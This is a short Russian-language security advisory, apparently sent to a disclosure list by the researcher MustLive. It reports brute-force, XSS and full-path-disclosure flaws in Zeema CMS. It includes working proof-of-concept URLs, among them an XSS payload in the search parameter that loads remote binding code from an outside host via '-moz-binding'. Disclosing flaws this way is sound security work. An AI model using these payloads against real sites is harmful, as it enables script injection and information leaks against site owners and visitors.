Уязвимости в Zeema CMS

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною Brute Force, Cross-Site Scripting и Full path disclosure уязвимостях в системе Zeema CMS. Это украинская коммерческая CMS.

Brute Force (WASC-11):

http://site/cms/

XSS (WASC-08):

http://site/search/?query=%22%20style=%22-moz-binding:url(http://websecurity.com.ua/webtools/xss.xml%23xss)

Атака сработает в браузерах Mozilla и Firefox.

Full path disclosure (WASC-13):

http://site/search/?page=10&query=site

Уязвимы все версии Zeema CMS.

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/5459/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua